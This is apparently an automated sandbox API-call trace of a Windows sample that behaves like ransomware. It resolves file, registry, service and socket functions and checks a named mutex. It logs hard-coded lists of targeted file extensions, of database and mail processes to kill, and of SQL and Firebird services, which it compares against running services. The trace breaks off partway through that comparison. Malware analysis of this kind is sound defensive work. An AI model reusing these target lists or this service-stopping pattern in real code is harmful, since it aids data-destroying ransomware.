[0177.306] GetProcAddress (hModule=0x77050000, lpProcName="FindNextFileW") returned 0x770bee40 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="FindClose") returned 0x770bed70 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="MoveFileW") returned 0x7709e500 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="GetFileSizeEx") returned 0x770bef40 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="GetModuleFileNameW") returned 0x77065090 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="GetFileAttributesW") returned 0x770bef10 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="ExitProcess") returned 0x77063cb0 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="GetCommandLineW") returned 0x77064cc0 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="GetComputerNameW") returned 0x770932c0 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="GetComputerNameA") returned 0x77093780 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="CreateMutexW") returned 0x770beb70 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="lstrlenW") returned 0x77066c70 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="lstrlenA") returned 0x77066c50 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="GetCurrentProcess") returned 0x770bea10 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="WaitForSingleObject") returned 0x770beca0 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="GetLogicalDrives") returned 0x77060d20 [0177.307] GetProcAddress (hModule=0x77050000, lpProcName="GetTickCount") returned 0x770bdd50 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="DeleteFileW") returned 0x770bed40 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="WideCharToMultiByte") returned 0x77066b10 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x770bebb0 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="Sleep") returned 0x77066760 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="LeaveCriticalSection") returned 0x7789b250 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="ReadFile") returned 0x770bf090 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="CreateFileW") returned 0x770bed10 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="OpenMutexW") returned 0x770bebf0 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="EnterCriticalSection") returned 0x7789b2d0 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="WaitForMultipleObjects") returned 0x770bec80 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="lstrcmpiW") returned 0x77066bf0 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="lstrcmpiA") returned 0x77066bd0 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="DeleteCriticalSection") returned 0x7787fb90 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="ReleaseMutex") returned 0x770bec20 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="CloseHandle") returned 0x770beab0 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="GetVersion") returned 0x770656c0 [0177.308] GetProcAddress (hModule=0x77050000, lpProcName="CreateThread") returned 0x770646b0 [0177.309] GetProcAddress (hModule=0x77050000, lpProcName="ExpandEnvironmentStringsW") returned 0x77064a40 [0177.309] GetProcAddress (hModule=0x77050000, lpProcName="QueryPerformanceCounter") returned 0x77065da0 [0177.309] GetProcAddress (hModule=0x77050000, lpProcName="QueryPerformanceFrequency") returned 0x77065dc0 [0177.309] GetProcAddress (hModule=0x77050000, lpProcName="GetCurrentProcessId") returned 0x770bea20 [0177.309] GetProcAddress (hModule=0x77050000, lpProcName="SetFileAttributesW") returned 0x770bf100 [0177.309] GetProcAddress (hModule=0x77050000, lpProcName="GetVolumeInformationW") returned 0x770bf020 [0177.309] GetProcAddress (hModule=0x77050000, lpProcName="WriteFile") returned 0x770bf180 [0177.309] GetProcAddress (hModule=0x77050000, lpProcName="SetFilePointerEx") returned 0x770bf130 [0177.309] GetProcAddress (hModule=0x77050000, lpProcName="SetEndOfFile") returned 0x770bf0e0 [0177.309] GetProcAddress (hModule=0x77050000, lpProcName="FindFirstFileW") returned 0x770bedf0 [0177.309] GetProcAddress (hModule=0x77050000, lpProcName="GetProcessHeap") returned 0x770651f0 [0177.309] GetProcAddress (hModule=0x77050000, lpProcName="HeapReAlloc") returned 0x7788f630 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="HeapAlloc") returned 0x77892dc0 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="HeapFree") returned 0x770657f0 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="CreatePipe") returned 0x77064590 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="SetHandleInformation") returned 0x770beae0 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="CreateProcessW") returned 0x77064610 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="CompareStringW") returned 0x77064430 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="CompareStringA") returned 0x77064410 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="OpenProcess") returned 0x77065cc0 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="TerminateProcess") returned 0x770667e0 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="GetSystemTime") returned 0x770654e0 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="SystemTimeToFileTime") returned 0x770667a0 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="GetLastError") returned 0x77065010 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="CreateToolhelp32Snapshot") returned 0x7709edc0 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="Process32NextW") returned 0x7709f8f0 [0177.310] GetProcAddress (hModule=0x77050000, lpProcName="Process32FirstW") returned 0x7709f750 [0177.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x75b90000 [0177.336] GetProcAddress (hModule=0x75b90000, lpProcName="RegOpenKeyExW") returned 0x75bae580 [0177.337] GetProcAddress (hModule=0x75b90000, lpProcName="RegQueryValueExW") returned 0x75bae5a0 [0177.337] GetProcAddress (hModule=0x75b90000, lpProcName="RegSetValueExW") returned 0x75baf530 [0177.337] GetProcAddress (hModule=0x75b90000, lpProcName="RegCloseKey") returned 0x75baed60 [0177.337] GetProcAddress (hModule=0x75b90000, lpProcName="OpenProcessToken") returned 0x75baefb0 [0177.337] GetProcAddress (hModule=0x75b90000, lpProcName="GetTokenInformation") returned 0x75baee90 [0177.337] GetProcAddress (hModule=0x75b90000, lpProcName="OpenSCManagerW") returned 0x75bb0540 [0177.337] GetProcAddress (hModule=0x75b90000, lpProcName="OpenServiceW") returned 0x75bafa20 [0177.337] GetProcAddress (hModule=0x75b90000, lpProcName="CloseServiceHandle") returned 0x75bafc00 [0177.337] GetProcAddress (hModule=0x75b90000, lpProcName="ControlService") returned 0x75bc26d0 [0177.337] GetProcAddress (hModule=0x75b90000, lpProcName="QueryServiceStatus") returned 0x75bb2380 [0177.337] GetProcAddress (hModule=0x75b90000, lpProcName="EnumDependentServicesW") returned 0x75bc2f70 [0177.338] GetProcAddress (hModule=0x75b90000, lpProcName="EnumServicesStatusExW") returned 0x75bafc80 [0177.338] LoadLibraryA (lpLibFileName="user32.dll") returned 0x774c0000 [0177.451] GetProcAddress (hModule=0x774c0000, lpProcName="SystemParametersInfoW") returned 0x774ef210 [0177.451] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x744f0000 [0177.482] GetProcAddress (hModule=0x744f0000, lpProcName="ShellExecuteExW") returned 0x74654730 [0177.482] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77850000 [0177.482] GetProcAddress (hModule=0x77850000, lpProcName="NtQuerySystemInformation") returned 0x778c2070 [0177.482] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74250000 [0177.492] GetProcAddress (hModule=0x74250000, lpProcName="WNetCloseEnum") returned 0x74252640 [0177.492] GetProcAddress (hModule=0x74250000, lpProcName="WNetOpenEnumW") returned 0x74252790 [0177.492] GetProcAddress (hModule=0x74250000, lpProcName="WNetEnumResourceW") returned 0x74252410 [0177.492] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76f10000 [0177.495] GetProcAddress (hModule=0x76f10000, lpProcName="WSAStartup") returned 0x76f15b40 [0177.495] GetProcAddress (hModule=0x76f10000, lpProcName="socket") returned 0x76f24510 [0177.495] GetProcAddress (hModule=0x76f10000, lpProcName="send") returned 0x76f15030 [0177.496] GetProcAddress (hModule=0x76f10000, lpProcName="recv") returned 0x76f20c50 [0177.496] GetProcAddress (hModule=0x76f10000, lpProcName="connect") returned 0x76f15410 [0177.496] GetProcAddress (hModule=0x76f10000, lpProcName="closesocket") returned 0x76f20910 [0177.496] GetProcAddress (hModule=0x76f10000, lpProcName="gethostbyname") returned 0x76f46cb0 [0177.496] GetProcAddress (hModule=0x76f10000, lpProcName="inet_addr") returned 0x76f29160 [0177.496] GetProcAddress (hModule=0x76f10000, lpProcName="ntohl") returned 0x76f149d0 [0177.496] GetProcAddress (hModule=0x76f10000, lpProcName="htonl") returned 0x76f149d0 [0177.496] GetProcAddress (hModule=0x76f10000, lpProcName="htons") returned 0x76f28ff0 [0177.496] GetProcessHeap () returned 0x680000 [0177.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x68ae98 [0177.497] QueryPerformanceCounter (in: lpPerformanceCount=0x19fdb0 | out: lpPerformanceCount=0x19fdb0*=9800944433) returned 1 [0177.497] GetTickCount () returned 0x17eb0 [0177.497] GetCurrentProcessId () returned 0x2a8 [0177.499] GetTickCount () returned 0x17eb0 [0177.499] GetTickCount () returned 0x17eb0 [0177.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x68aec0 [0177.499] GetVersion () returned 0x23f00206 [0177.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7) returned 0x696d80 [0177.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x697eb0 [0177.499] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697eb0, Size=0x20) returned 0x68aee8 [0177.499] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x68aee8, Size=0x40) returned 0x697b40 [0177.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x69e850 [0177.499] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_1TPBM0A") returned 0x1ec [0177.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696d80 | out: hHeap=0x680000) returned 1 [0177.500] lstrlenW (lpString="Global\\syncronize_") returned 18 [0177.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x697b40 | out: hHeap=0x680000) returned 1 [0177.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7) returned 0x696eb0 [0177.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x698150 [0177.500] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x698150, Size=0x20) returned 0x68aee8 [0177.500] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x68aee8, Size=0x40) returned 0x6978b8 [0177.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x6ae858 [0177.500] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_1TPBM0U") returned 0x1f0 [0177.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696eb0 | out: hHeap=0x680000) returned 1 [0177.500] lstrlenW (lpString="Global\\syncronize_") returned 18 [0177.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6978b8 | out: hHeap=0x680000) returned 1 [0177.500] GetVersion () returned 0x23f00206 [0177.500] GetCurrentProcess () returned 0xffffffff [0177.500] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fd9c | out: TokenHandle=0x19fd9c*=0x1f4) returned 1 [0177.500] GetTokenInformation (in: TokenHandle=0x1f4, TokenInformationClass=0x14, TokenInformation=0x19fd98, TokenInformationLength=0x4, ReturnLength=0x19fda4 | out: TokenInformation=0x19fd98, ReturnLength=0x19fda4) returned 1 [0177.500] CloseHandle (hObject=0x1f4) returned 1 [0177.500] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x102 [0177.501] WaitForSingleObject (hHandle=0x1ec, dwMilliseconds=0x3e8) returned 0x0 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x6966c0 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6980c0 [0177.501] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6980c0, Size=0x20) returned 0x68aee8 [0177.501] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x68aee8, Size=0x40) returned 0x6978b8 [0177.501] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6978b8, Size=0x80) returned 0x696818 [0177.501] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696818, Size=0x100) returned 0x697d38 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x34) returned 0x69a530 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x696e50 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x696db0 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x696d80 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6980c0 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x696e80 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x698108 [0177.501] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696e80, Size=0x8) returned 0x696ea0 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x697f88 [0177.501] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696ea0, Size=0x10) returned 0x698180 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x697fb8 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6980d8 [0177.501] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x698180, Size=0x20) returned 0x68aee8 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6980f0 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x698150 [0177.501] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696e50, Size=0x8) returned 0x696e80 [0177.501] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696db0, Size=0x8) returned 0x696e50 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x696db0 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x698180 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x696ea0 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x697eb0 [0177.501] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696ea0, Size=0x8) returned 0x696ed0 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x698210 [0177.501] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696ed0, Size=0x10) returned 0x698240 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6981f8 [0177.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x696eb0 [0177.502] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x698240, Size=0x20) returned 0x6be9d0 [0177.502] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696e80, Size=0x10) returned 0x6981e0 [0177.502] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696e50, Size=0x10) returned 0x698228 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x696e50 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x698240 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x696e80 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6981b0 [0177.502] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696e80, Size=0x8) returned 0x696ea0 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x696e80 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6981c8 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x696ed0 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x698258 [0177.502] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696ed0, Size=0x8) returned 0x6bf0f8 [0177.502] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6981e0, Size=0x20) returned 0x6be9f8 [0177.502] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x698228, Size=0x20) returned 0x6beb60 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf108 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6981e0 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6bf268 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x698228 [0177.502] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bf268, Size=0x8) returned 0x6bf0b8 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x6965e0 [0177.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x696720 [0177.502] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0177.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x697d38 | out: hHeap=0x680000) returned 1 [0177.502] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fde8 | out: lpWSAData=0x19fde8) returned 0 [0177.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x698198 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x698198, Size=0x20) returned 0x6beb10 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6beb10, Size=0x40) returned 0x697b88 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697b88, Size=0x80) returned 0x697d38 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697d38, Size=0x100) returned 0x697d38 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x698198 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x698198, Size=0x20) returned 0x6be9a8 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6be9a8, Size=0x40) returned 0x697558 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697558, Size=0x80) returned 0x6c3d78 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c3d78, Size=0x100) returned 0x6985f8 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x698198 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6bf138 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6c4948 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bf138, Size=0x8) returned 0x6bf1e8 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x696760 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bf1e8, Size=0x10) returned 0x6c4c00 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x696520 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1a) returned 0x6beb88 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4c00, Size=0x20) returned 0x6bebb0 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c) returned 0x6bed18 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16) returned 0x6964a0 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1a) returned 0x6beae8 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6c49d8 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6bf138 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x697b40 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bf138, Size=0x8) returned 0x6bf238 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x3c) returned 0x697708 [0177.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bf238, Size=0x10) returned 0x6c4b40 [0177.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x696620 [0177.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x696700 [0177.507] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4b40, Size=0x20) returned 0x6bea70 [0177.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x695658 [0177.507] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0177.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x697d38 | out: hHeap=0x680000) returned 1 [0177.507] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0177.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6985f8 | out: hHeap=0x680000) returned 1 [0177.507] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bec00 [0177.510] EnumServicesStatusExW (in: hSCManager=0x6bec00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0) returned 0 [0177.510] GetLastError () returned 0xea [0177.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6c77e0 [0177.511] EnumServicesStatusExW (in: hSCManager=0x6bec00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c77e0, cbBufSize=0x1c30, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c77e0, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0) returned 1 [0177.512] CloseServiceHandle (hSCObject=0x6bec00) returned 1 [0177.512] lstrlenW (lpString="Appinfo") returned 7 [0177.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0177.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0177.514] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0177.514] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0177.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0177.515] lstrlenW (lpString="AppXSvc") returned 7 [0177.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0177.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0177.515] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0177.515] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0177.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0177.515] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0177.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0177.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0177.515] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0177.515] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0177.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0177.515] lstrlenW (lpString="Audiosrv") returned 8 [0177.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0177.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0177.515] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0177.515] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0177.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0177.515] lstrlenW (lpString="BFE") returned 3 [0177.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0177.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0177.515] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0177.515] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0177.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0177.515] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0177.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0177.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0177.515] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0177.515] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0177.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0177.515] lstrlenW (lpString="CDPSvc") returned 6 [0177.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0177.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0177.516] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0177.516] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0177.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0177.516] lstrlenW (lpString="ClickToRunSvc") returned 13 [0177.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0177.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0177.516] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0177.516] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0177.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0177.516] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0177.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0177.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0177.516] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0177.516] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0177.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 